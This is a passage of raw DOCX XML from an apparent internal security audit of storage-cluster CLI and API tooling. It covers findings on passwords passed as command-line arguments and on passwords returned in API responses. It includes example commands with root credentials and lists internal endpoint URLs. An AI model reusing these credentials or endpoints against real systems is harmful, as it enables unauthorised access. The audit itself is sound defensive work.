              </w:rPr>
              <w:t xml:space="preserve"> copy-ssh-id --hostname </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>emsvm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> --password cluster --username root --</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>utilityBareMetal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> --insecure-skip-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>tls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>-verify</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="189050B9" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000" w:rsidP="000C5CD8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:ind w:hanging="176"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>lpp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>mmfs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>essctl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>essrun</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> config-load -n c145f15ess6k01a.gpfs.test -p cluster -b </w:t>
            </w:r>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>admin123 --</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>utilityBareMetal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> --insecure-skip-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>tls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>-verify</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73757BDB" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000" w:rsidP="000C5CD8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:ind w:hanging="176"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>lpp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>mmfs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>essctl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>essrun</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> config-load -n c145f15ess6k01a.gpfs.test -p cluster -b admin123 --</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>utilityBareMetal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> --insecure-skip-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>tls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="000C5CD8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>-verify</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="148ED76B" w14:textId="77777777" w:rsidTr="00DB00AB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="706454BD" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Vulnerability Impact</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5413BEE2" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>A user can obtain sensitive information like username, password especially if the same command is reflected in the logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="59DE793E" w14:textId="77777777" w:rsidTr="00DB00AB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46EAEC40" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Fix Recommendation / Mitigation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D763EEC" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Disable/Remove passing sensitive information via CLI arguments.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C58BE3F" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Store credentials in environment variables and read them inside the application.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="738760E8" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Use Configuration Files with Restricted Permissions</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B9DA562" w14:textId="5E785902" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Interactive Prompt for sensitive co</w:t>
            </w:r>
            <w:r w:rsidR="001B327B">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>n</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>tent.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5DC1A9E6" w14:textId="77777777" w:rsidR="00DB00AB" w:rsidRDefault="00DB00AB" w:rsidP="00DB00AB">
      <w:pPr>
        <w:pStyle w:val="heading3"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId77" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=195199">
        <w:bookmarkStart w:id="50" w:name="_Toc200561001"/>
        <w:bookmarkStart w:id="51" w:name="_Toc200562854"/>
        <w:r>
          <w:rPr>
            <w:b/>
            <w:sz w:val="36"/>
          </w:rPr>
          <w:t>195199: Password Returned In Response</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="C1BABA"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Informational)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
      <w:bookmarkEnd w:id="51"/>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4A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9410"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB00AB" w14:paraId="25DEEF17" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="699FC228" w14:textId="77777777" w:rsidR="00DB00AB" w:rsidRDefault="00DB00AB" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D6D4402" w14:textId="381C7F5B" w:rsidR="00DB00AB" w:rsidRDefault="00DB00AB" w:rsidP="000777C6">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">APIs return passwords submitted in cleartext form in the responses. This </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>behavior</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> increases the risk of user's passwords captured by an attacker. Many types of vulnerabilities such as weaknesses in session handling, broken access controls, and cross-site scripting could enable an attacker to leverage this </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>behavior</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> to retrieve the passwords of other CLI users. This possibility typically exacerbates the impact of those other vulnerabilities, and in some situations can enable an attacker to quickly compromise the entire CLI/API. It is observed that the application sends passwords in the response.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43D6E368" w14:textId="384EA332" w:rsidR="00DB00AB" w:rsidRDefault="00DB00AB" w:rsidP="0035444C">
            <w:pPr>
              <w:jc w:val="distribute"/>
            </w:pPr>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0640BCB5" wp14:editId="7C941350">
                  <wp:extent cx="5930900" cy="3111500"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="34" name="Drawing 34" descr="workitemimagea"/>
                  <wp:cNvGraphicFramePr/>
                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="Picture 34" descr="workitemimagea"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId78"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5930900" cy="3111500"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB00AB" w14:paraId="5E8D5D3F" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="748704D1" w14:textId="6B1635E3" w:rsidR="00DB00AB" w:rsidRDefault="00DB00AB" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Affected </w:t>
            </w:r>
            <w:r w:rsidR="005D5728">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>CLI</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>/API(s)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AD0C05B" w14:textId="77777777" w:rsidR="00DB00AB" w:rsidRDefault="00DB00AB" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://9.114.12.78:46443/scalemgmt/v3/operations</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35705BC5" w14:textId="77777777" w:rsidR="00DB00AB" w:rsidRDefault="00DB00AB" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://9.114.12.78:46443/scalemgmt/v3/operations/{id}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="327D6005" w14:textId="77777777" w:rsidR="00DB00AB" w:rsidRDefault="00DB00AB" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://9.114.12.78:46443/sss/v3/config_load</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ED97649" w14:textId="77777777" w:rsidR="00DB00AB" w:rsidRDefault="00DB00AB" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://9.114.12.78:46443/sss/v3/configure_gui</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="479B9986" w14:textId="77777777" w:rsidR="00DB00AB" w:rsidRDefault="00DB00AB" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://9.114.12.78:46443/sss/v3/copy_ssh_id</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="375D7CB3" w14:textId="77777777" w:rsidR="00DB00AB" w:rsidRDefault="00DB00AB" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://9.114.12.78:46443/sss/v3/run_ess_ssr_setup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1885C2C2" w14:textId="77777777" w:rsidR="00DB00AB" w:rsidRDefault="00DB00AB" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1B00FF"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>https://9.114.12.78:46443/sss/v3/set_new_password_to_emsvm23e</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB00AB" w14:paraId="38909AA6" w14:textId="77777777" w:rsidTr="0035444C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="703F32BE" w14:textId="77777777" w:rsidR="00DB00AB" w:rsidRDefault="00DB00AB" w:rsidP="0035444C">
            <w:pPr>
              <w:ind w:left="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Vulnerability Impact</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="438AA2B4" w14:textId="77777777" w:rsidR="00DB00AB" w:rsidRDefault="00DB00AB" w:rsidP="0035444C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="300"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
